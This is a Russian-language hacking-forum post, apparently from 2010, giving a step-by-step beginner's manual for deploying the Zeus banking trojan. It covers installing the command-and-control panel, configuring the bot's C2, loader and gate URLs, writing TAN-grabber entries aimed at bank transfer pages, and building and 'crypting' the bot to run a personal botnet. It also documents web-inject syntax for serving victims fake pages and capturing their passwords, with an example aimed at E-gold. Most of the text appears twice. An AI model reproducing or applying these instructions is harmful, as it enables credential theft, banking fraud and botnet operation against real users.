_Stealer_
26.04.2010, 20:53
Подробный мануал по Zeus + Видео (только для новичков)
В конце мануала архив:
TEXT_MANUAL – Подробнейший мануал от автора
Zeus scripts – Скрипты админки (Zeus 1.3.2.1 ) и билдер бота (Zeus 1.2.7.19)
Zeus_video – И само видео.
Полное описание, что это за бот и его возможности вы сможете прочитать скачав архив, в папке TEXT_MANUAL
Приступим к настройке:
Нам понадобиться хостинг с поддержкой Mysql и PHP
Создадим базу данных и перейдем к установке админки
Перенесем содержимое папки ./Zeus scripts/Web на наш хостинг и запустим через браузер инсталлятор
Пример:
[Ссылки доступны только зарегистрированным пользователям]
Видим следующее:
Рис 1.
[Ссылки доступны только зарегистрированным пользователям]
Control Panel 1.3.2.1 Installer
Root user:
User name: (1-20 chars): // Вводим логин пользователя
Password (6-64 chars): // Вводим пароль пользователя
MySQL server:
Host: // Host Mysql – Обычно это localhost
User: // Имя user базы данных
Password: // Пароль user базы данных
Database: // Имя базы данных
Local folders:
Reports: // Название папки с отчетами, по дефолту стоит _reports
Options:
Online bot timeout: // Таймаут бота, по дефолту стоит 25
Encryption key (1-255 chars): // Ключ бота, от 1 до 255 латинских символов
Enable write reports to database. // Сохранять отчеты в базу данных?
Enable write reports to local path. // Сохранять отчеты в локальную папку (по дефолту _reports) ?
После ввода всех данных, жмем Install и дожидаемся установки.
После видим следующее:
Рис 2.
[Ссылки доступны только зарегистрированным пользователям]
Это значит, что установка завершена
Удаляем с хостинга папку install она нам больше не понадобится
Можем смело направляться в админку [Ссылки доступны только зарегистрированным пользователям]
Рис 3.
[Ссылки доступны только зарегистрированным пользователям]
Вводим логин и пароль указанные при установке скриптов.
И попадаем в админку:
Рис 4.
[Ссылки доступны только зарегистрированным пользователям]
Пол дела сделано.
Теперь переходим к настройке бота ./Zeus scripts/Builder 1.2.7.19
Видим 4 файла:
config.txt // Конфигуратор бота
webinjects.txt // Файл со стандартными инжектами
webinjects new.txt // Файл с дополнительными инжектами, если хотим воспользоваться, просто переименуйте в webinjects txt
zsb.exe // Сам билдер Zeus
Запускаем билдер, переходим на вкладку Builder:
Рис 5.
[Ссылки доступны только зарегистрированным пользователям]
Билдер сам нашел путь к config.txt
Жмем Edit Config:
;Build time: 09:48:52 12.08.2009 GMT
;Version: 1.2.7.19
entry "StaticConfig"
;botnet "btn1"
timer_config 60 1
timer_logs 1 1
timer_stats 20 1
url_config "[Ссылки доступны только зарегистрированным пользователям]"
url_compip "[Ссылки доступны только зарегистрированным пользователям]" 4096
encryption_key "122122"
;blacklist_languages 1049
end
entry "DynamicConfig"
url_loader "[Ссылки доступны только зарегистрированным пользователям]"
url_server "[Ссылки доступны только зарегистрированным пользователям]"
file_webinjects "webinjects.txt"
entry "AdvancedConfigs"
;"[Ссылки доступны только зарегистрированным пользователям]"
end
entry "WebFilters"
"!*.microsoft.com/*"
"![Ссылки доступны только зарегистрированным пользователям]*myspace.com*"
"[Ссылки доступны только зарегистрированным пользователям]*"
"![Ссылки доступны только зарегистрированным пользователям]*odnoklassniki.ru/*"
"![Ссылки доступны только зарегистрированным пользователям]*"
"@*/login.osmp.ru/*"
"@*/atl.osmp.ru/*"
end
entry "WebDataFilters"
;"[Ссылки доступны только зарегистрированным пользователям]*" "passw;login"
end
entry "WebFakes"
;"[Ссылки доступны только зарегистрированным пользователям]" "[Ссылки доступны только зарегистрированным пользователям]" "GP" "" ""
end
entry "TANGrabber"
"[Ссылки доступны только зарегистрированным пользователям]*.de/cgi/ueberweisung.cgi/*" "S3R1C6G" "*&tid=*" "*&betrag=*"
"[Ссылки доступны только зарегистрированным пользователям]*" "S3C6" "*" "*" "KktNrTanEnz"
"[Ссылки доступны только зарегистрированным пользователям]*/jba/mp#/SubmitRecap.do" "S3C6R2" "SYNC_TOKEN=*" "*"
end
entry "DnsMap"
;127.0.0.1 microsoft.com
end
end
Теперь начинаем править под свой хост:
9 строка - url_config "[Ссылки доступны только зарегистрированным пользователям]" – путь к будущему cfg.bin файлу
11 строка - encryption_key "122122" - Ключ который вы вводили, когда устанавливали скрипты. Если забыли, то идем в админку
[Ссылки доступны только зарегистрированным пользователям] -> Options -> Options -> Encryption key:
Рис 6.
[Ссылки доступны только зарегистрированным пользователям]
16 строка - url_loader "[Ссылки доступны только зарегистрированным пользователям]" – Путь к будущему боту для загрузки
17 строка - url_server "[Ссылки доступны только зарегистрированным пользователям]" – Путь к gate.php для отстука бота
18 строка - file_webinjects "webinjects.txt" – название файла с инжектами
После настройки config.txt сохраняем и жмем Build Config и создавшийся файл нам нужно залить на хостинг согласно настройкам. В нашем случае путь должен быть [Ссылки доступны только зарегистрированным пользователям]
Рис 7.
[Ссылки доступны только зарегистрированным пользователям]
После сохранения видим BUILD SUCCEEDED! Значит все гуд.
Идем дальше, жмем Builder loader и сохраняем по настройкам, что бы путь получился [Ссылки доступны только зарегистрированным пользователям]
Рис 8.
[Ссылки доступны только зарегистрированным пользователям]
Видим Build succeeded!
Теперь можем закрыть билдер и запустить бота
Отстук можем увидеть в админке
Для удаления Zeus с вашего компьютера (Рекомендую не использовать компьютер для бидла и тестинга Zeus, используйте виртуальную машину) запустите еще раз Bulder и нажмите Remove spyware from this system, в поившемся окне жмем ОК, после чего перезагружаем компьютер.
Рис 9.
[Ссылки доступны только зарегистрированным пользователям]
Остается криптануть, делать загрузки и наслаждаться личным ботнетом =)
Инжекты для Zeus
- Я новичок в этом деле, расскажи для чего же нужны инжекты?
- Представим, что мы хотим сделать себе троян, который будет воровать пароли от банковского счета! ну или от обычной почты
Под каждый веб ресурс нам нужен свой код инжекта и если правильно составить код ввода данных, то жертва получит фейковую страницу, а мы тем временем пароли =)
Флаги
Определяет основное условие загрузки, может состоять из нескольких флагов в любом порядке, но с учетом регистра. В настоящее время доступны следующие флаги:
P - запускать веб-инжект при POST запросе на URL.
G - запускать веб-инжект при GET запросе на URL.
L - изменяет предназначение веб-инжекта, если указать этот флаг, то будет получен нужный кусок данных и немедленно сохранен в лог.
F - дополняет флаг L, позволяет записывать результат не в лог, а в отдельный файл.
H - дополняет флаг L, сохраняет нужный кусок данных без вырезания тегов.
D - запускать веб-инжект раз в 24 часа.
BlackMask POST
Представляет из себя маску POST-данных передаваемых URL, при которых не будет запускаться веб-инжект.
WhiteMask POST
Представляет из себя маску POST-данных передаваемых URL, при которых будет запускаться веб-инжект.
URL
URL на которую должен срабатывать веб-инжект, можно использовать маску.
URL блокировки
В случаи если ваш веб-инжект должен грузиться лиш один раз на компьютере жертвы, то здесь следует указать маску URL, в случаи открытия которой данный Веб-инжект не будет более использоваться на компьютере.
Если вам этого не нужно, оставьте поле пустым.
Mask context
Маска части содержимого страницы, при котором должен сработать веб-инжект.
После указания URL, со следующей строки начинается перечисление веб-инжектов, которое длится до тех пор, пока не достигнут конец файла или не задана новая URL при помощи очередной записи set_url. Один веб-инжект состоит из трех элементов:
Без флага L:
data_before - маска данных после которых нужно записать новые данные.
data_after - маска данных перед которыми следует записать новые данные.
data_inject - новые данные, на которые будет заменено содержимое между data_before, data_after.
С флагом L:
data_before - маска данных после которых начинается кусок получаемых данных.
data_after - маска данных перед которыми кончается кусок получаемых данных.
data_inject - играет роль заголовка для получаемых данных, нужен лишь для визуального выделения в логах.
Название элемента должно начинаться с первого байта новой строки и сразу после окончания названия должен быть перенос на следующею строку. Со следующей строки идут данные веб-инжекта, окончание данных обозначается строкой data_end, также это строка должна начинаться с первого байта очередной строки. Внутри элемента вы можете свободно использовать любые символы
Примечания:
Как известно, новая строка может обозначаться одним (0x0A) или двумя (0x0D и 0x0A) байтами. Т.к. в основном веб-инжект используется для подмены содержимого текстовых данных, то данная особенность учтена, и бот успешно запускает веб-инжект даже если у вас новые строки обозначены двумя байтами, а в содержимом URL одним байтом и наоборот.
Элементы веб-инжекта могут быть расположены в любом порядке, т.е. data_before, data_after, data_inject, или data_before, data_inject, data_after и т.д.
Элемент может быть пустым.
При использовании флага L, в получаемых данных каждый тег заменяться на один пробел.
Пример файла:
Подмена заголовка любого сайта по протоколу http на фразу "[Ссылки доступны только зарегистрированным пользователям] Web-Inject"
;set_url [Ссылки доступны только зарегистрированным пользователям]* GP
data_before
<title>
data_end
data_inject
[Ссылки доступны только зарегистрированным пользователям] Web-Inject
data_end
data_after
</title>
data_end
;Подмена заголовка любого сайта по протоколу http на фразу "[Ссылки доступны только зарегистрированным пользователям] Web-Inject" и добавление текста "bоdу: Web-Inject" сразу после тега <bоdу>
set_url [Ссылки доступны только зарегистрированным пользователям]* GP
data_before
<title>
data_end
data_inject
[Ссылки доступны только зарегистрированным пользователям] Web-Inject
data_end
data_after
</title>
data_end
data_before
<bоdу>
data_end
data_inject
<hr>bоdу: Web-Inject<hr>
data_end
data_after
data_end
Получаем заголовок страницы
set_url [Ссылки доступны только зарегистрированным пользователям]*yahoo.com* LGP
data_before
<title>
data_end
data_inject
Yahoo Title: Web-Inject
data_end
data_after
</title>
data_end
Собранный инжект, Пример под E-gold:
set_url [Ссылки доступны только зарегистрированным пользователям]* GPL
data_before
<form name=fiat*</form>
data_end
data_inject
data_end
data_after
<th colspan=4 align=left valign="bottom"
data_end
© Zorg ([Ссылки доступны только зарегистрированным пользователям]) хакер ру ([Ссылки доступны только зарегистрированным пользователям])
Ссылки на видео:
[Ссылки доступны только зарегистрированным пользователям]
пароль на архив:.:: Вы должны 'сказать спасибо', чтобы увидеть скрытый текст содержащейся здесь. ::.
*****ВНИМАНИЕ!!!*****
После скачивания программы ZeuS настоятельно рекомендуется проверить её антивирусом. Файлы, которые вы загружаете никем не проверены и вы скачиваете их на свой страх и риск. Некоторые программы, которые вы можете найти на сайте, могут определяться антивирусами как hack tools (хакерская программа). Такие программы не наносят вреда вашему компьютеру, однако, стоит учитывать, что в некоторых случаях их использование может попасть под 272-273 статью УК РФ.
В конце мануала архив:
TEXT_MANUAL – Подробнейший мануал от автора
Zeus scripts – Скрипты админки (Zeus 1.3.2.1 ) и билдер бота (Zeus 1.2.7.19)
Zeus_video – И само видео.
Полное описание, что это за бот и его возможности вы сможете прочитать скачав архив, в папке TEXT_MANUAL
Приступим к настройке:
Нам понадобиться хостинг с поддержкой Mysql и PHP
Создадим базу данных и перейдем к установке админки
Перенесем содержимое папки ./Zeus scripts/Web на наш хостинг и запустим через браузер инсталлятор
Пример:
[Ссылки доступны только зарегистрированным пользователям]
Видим следующее:
Рис 1.
[Ссылки доступны только зарегистрированным пользователям]
Control Panel 1.3.2.1 Installer
Root user:
User name: (1-20 chars): // Вводим логин пользователя
Password (6-64 chars): // Вводим пароль пользователя
MySQL server:
Host: // Host Mysql – Обычно это localhost
User: // Имя user базы данных
Password: // Пароль user базы данных
Database: // Имя базы данных
Local folders:
Reports: // Название папки с отчетами, по дефолту стоит _reports
Options:
Online bot timeout: // Таймаут бота, по дефолту стоит 25
Encryption key (1-255 chars): // Ключ бота, от 1 до 255 латинских символов
Enable write reports to database. // Сохранять отчеты в базу данных?
Enable write reports to local path. // Сохранять отчеты в локальную папку (по дефолту _reports) ?
После ввода всех данных, жмем Install и дожидаемся установки.
После видим следующее:
Рис 2.
[Ссылки доступны только зарегистрированным пользователям]
Это значит, что установка завершена
Удаляем с хостинга папку install она нам больше не понадобится
Можем смело направляться в админку [Ссылки доступны только зарегистрированным пользователям]
Рис 3.
[Ссылки доступны только зарегистрированным пользователям]
Вводим логин и пароль указанные при установке скриптов.
И попадаем в админку:
Рис 4.
[Ссылки доступны только зарегистрированным пользователям]
Пол дела сделано.
Теперь переходим к настройке бота ./Zeus scripts/Builder 1.2.7.19
Видим 4 файла:
config.txt // Конфигуратор бота
webinjects.txt // Файл со стандартными инжектами
webinjects new.txt // Файл с дополнительными инжектами, если хотим воспользоваться, просто переименуйте в webinjects txt
zsb.exe // Сам билдер Zeus
Запускаем билдер, переходим на вкладку Builder:
Рис 5.
[Ссылки доступны только зарегистрированным пользователям]
Билдер сам нашел путь к config.txt
Жмем Edit Config:
;Build time: 09:48:52 12.08.2009 GMT
;Version: 1.2.7.19
entry "StaticConfig"
;botnet "btn1"
timer_config 60 1
timer_logs 1 1
timer_stats 20 1
url_config "[Ссылки доступны только зарегистрированным пользователям]"
url_compip "[Ссылки доступны только зарегистрированным пользователям]" 4096
encryption_key "122122"
;blacklist_languages 1049
end
entry "DynamicConfig"
url_loader "[Ссылки доступны только зарегистрированным пользователям]"
url_server "[Ссылки доступны только зарегистрированным пользователям]"
file_webinjects "webinjects.txt"
entry "AdvancedConfigs"
;"[Ссылки доступны только зарегистрированным пользователям]"
end
entry "WebFilters"
"!*.microsoft.com/*"
"![Ссылки доступны только зарегистрированным пользователям]*myspace.com*"
"[Ссылки доступны только зарегистрированным пользователям]*"
"![Ссылки доступны только зарегистрированным пользователям]*odnoklassniki.ru/*"
"![Ссылки доступны только зарегистрированным пользователям]*"
"@*/login.osmp.ru/*"
"@*/atl.osmp.ru/*"
end
entry "WebDataFilters"
;"[Ссылки доступны только зарегистрированным пользователям]*" "passw;login"
end
entry "WebFakes"
;"[Ссылки доступны только зарегистрированным пользователям]" "[Ссылки доступны только зарегистрированным пользователям]" "GP" "" ""
end
entry "TANGrabber"
"[Ссылки доступны только зарегистрированным пользователям]*.de/cgi/ueberweisung.cgi/*" "S3R1C6G" "*&tid=*" "*&betrag=*"
"[Ссылки доступны только зарегистрированным пользователям]*" "S3C6" "*" "*" "KktNrTanEnz"
"[Ссылки доступны только зарегистрированным пользователям]*/jba/mp#/SubmitRecap.do" "S3C6R2" "SYNC_TOKEN=*" "*"
end
entry "DnsMap"
;127.0.0.1 microsoft.com
end
end
Теперь начинаем править под свой хост:
9 строка - url_config "[Ссылки доступны только зарегистрированным пользователям]" – путь к будущему cfg.bin файлу
11 строка - encryption_key "122122" - Ключ который вы вводили, когда устанавливали скрипты. Если забыли, то идем в админку
[Ссылки доступны только зарегистрированным пользователям] -> Options -> Options -> Encryption key:
Рис 6.
[Ссылки доступны только зарегистрированным пользователям]
16 строка - url_loader "[Ссылки доступны только зарегистрированным пользователям]" – Путь к будущему боту для загрузки
17 строка - url_server "[Ссылки доступны только зарегистрированным пользователям]" – Путь к gate.php для отстука бота
18 строка - file_webinjects "webinjects.txt" – название файла с инжектами
После настройки config.txt сохраняем и жмем Build Config и создавшийся файл нам нужно залить на хостинг согласно настройкам. В нашем случае путь должен быть [Ссылки доступны только зарегистрированным пользователям]
Рис 7.
[Ссылки доступны только зарегистрированным пользователям]
После сохранения видим BUILD SUCCEEDED! Значит все гуд.
Идем дальше, жмем Builder loader и сохраняем по настройкам, что бы путь получился [Ссылки доступны только зарегистрированным пользователям]
Рис 8.
[Ссылки доступны только зарегистрированным пользователям]
Видим Build succeeded!
Теперь можем закрыть билдер и запустить бота
Отстук можем увидеть в админке
Для удаления Zeus с вашего компьютера (Рекомендую не использовать компьютер для бидла и тестинга Zeus, используйте виртуальную машину) запустите еще раз Bulder и нажмите Remove spyware from this system, в поившемся окне жмем ОК, после чего перезагружаем компьютер.
Рис 9.
[Ссылки доступны только зарегистрированным пользователям]
Остается криптануть, делать загрузки и наслаждаться личным ботнетом =)
Инжекты для Zeus
- Я новичок в этом деле, расскажи для чего же нужны инжекты?
- Представим, что мы хотим сделать себе троян, который будет воровать пароли от банковского счета! ну или от обычной почты
Под каждый веб ресурс нам нужен свой код инжекта и если правильно составить код ввода данных, то жертва получит фейковую страницу, а мы тем временем пароли =)
Флаги
Определяет основное условие загрузки, может состоять из нескольких флагов в любом порядке, но с учетом регистра. В настоящее время доступны следующие флаги:
P - запускать веб-инжект при POST запросе на URL.
G - запускать веб-инжект при GET запросе на URL.
L - изменяет предназначение веб-инжекта, если указать этот флаг, то будет получен нужный кусок данных и немедленно сохранен в лог.
F - дополняет флаг L, позволяет записывать результат не в лог, а в отдельный файл.
H - дополняет флаг L, сохраняет нужный кусок данных без вырезания тегов.
D - запускать веб-инжект раз в 24 часа.
BlackMask POST
Представляет из себя маску POST-данных передаваемых URL, при которых не будет запускаться веб-инжект.
WhiteMask POST
Представляет из себя маску POST-данных передаваемых URL, при которых будет запускаться веб-инжект.
URL
URL на которую должен срабатывать веб-инжект, можно использовать маску.
URL блокировки
В случаи если ваш веб-инжект должен грузиться лиш один раз на компьютере жертвы, то здесь следует указать маску URL, в случаи открытия которой данный Веб-инжект не будет более использоваться на компьютере.
Если вам этого не нужно, оставьте поле пустым.
Mask context
Маска части содержимого страницы, при котором должен сработать веб-инжект.
После указания URL, со следующей строки начинается перечисление веб-инжектов, которое длится до тех пор, пока не достигнут конец файла или не задана новая URL при помощи очередной записи set_url. Один веб-инжект состоит из трех элементов:
Без флага L:
data_before - маска данных после которых нужно записать новые данные.
data_after - маска данных перед которыми следует записать новые данные.
data_inject - новые данные, на которые будет заменено содержимое между data_before, data_after.
С флагом L:
data_before - маска данных после которых начинается кусок получаемых данных.
data_after - маска данных перед которыми кончается кусок получаемых данных.
data_inject - играет роль заголовка для получаемых данных, нужен лишь для визуального выделения в логах.
Название элемента должно начинаться с первого байта новой строки и сразу после окончания названия должен быть перенос на следующею строку. Со следующей строки идут данные веб-инжекта, окончание данных обозначается строкой data_end, также это строка должна начинаться с первого байта очередной строки. Внутри элемента вы можете свободно использовать любые символы
Примечания:
Как известно, новая строка может обозначаться одним (0x0A) или двумя (0x0D и 0x0A) байтами. Т.к. в основном веб-инжект используется для подмены содержимого текстовых данных, то данная особенность учтена, и бот успешно запускает веб-инжект даже если у вас новые строки обозначены двумя байтами, а в содержимом URL одним байтом и наоборот.
Элементы веб-инжекта могут быть расположены в любом порядке, т.е. data_before, data_after, data_inject, или data_before, data_inject, data_after и т.д.
Элемент может быть пустым.
При использовании флага L, в получаемых данных каждый тег заменяться на один пробел.
Пример файла:
Подмена заголовка любого сайта по протоколу http на фразу "[Ссылки доступны только зарегистрированным пользователям] Web-Inject"
;set_url [Ссылки доступны только зарегистрированным пользователям]* GP
data_before
<title>
data_end
data_inject
[Ссылки доступны только зарегистрированным пользователям] Web-Inject
data_end
data_after
</title>
data_end
;Подмена заголовка любого сайта по протоколу http на фразу "[Ссылки доступны только зарегистрированным пользователям] Web-Inject" и добавление текста "bоdу: Web-Inject" сразу после тега <bоdу>
set_url [Ссылки доступны только зарегистрированным пользователям]* GP
data_before
<title>
data_end
data_inject
[Ссылки доступны только зарегистрированным пользователям] Web-Inject
data_end
data_after
</title>
data_end
data_before
<bоdу>
data_end
data_inject
<hr>bоdу: Web-Inject<hr>
data_end
data_after
data_end
Получаем заголовок страницы
set_url [Ссылки доступны только зарегистрированным пользователям]*yahoo.com* LGP
data_before
<title>
data_end
data_inject
Yahoo Title: Web-Inject
data_end
data_after
</title>
data_end
Собранный инжект, Пример под E-gold:
set_url [Ссылки доступны только зарегистрированным пользователям]* GPL
data_before
<form name=fiat*</form>
data_end
data_inject
data_end
data_after
<th colspan=4 align=left valign="bottom"
data_end
© Zorg ([Ссылки доступны только зарегистрированным пользователям]) хакер ру ([Ссылки доступны только зарегистрированным пользователям])
Ссылки на видео:
[Ссылки доступны только зарегистрированным пользователям]
пароль на архив:.:: Вы должны 'сказать спасибо', чтобы увидеть скрытый текст содержащейся здесь. ::.
*****ВНИМАНИЕ!!!*****
После скачивания программы ZeuS настоятельно рекомендуется проверить её антивирусом. Файлы, которые вы загружаете никем не проверены и вы скачиваете их на свой страх и риск. Некоторые программы, которые вы можете найти на сайте, могут определяться антивирусами как hack tools (хакерская программа). Такие программы не наносят вреда вашему компьютеру, однако, стоит учитывать, что в некоторых случаях их использование может попасть под 272-273 статью УК РФ.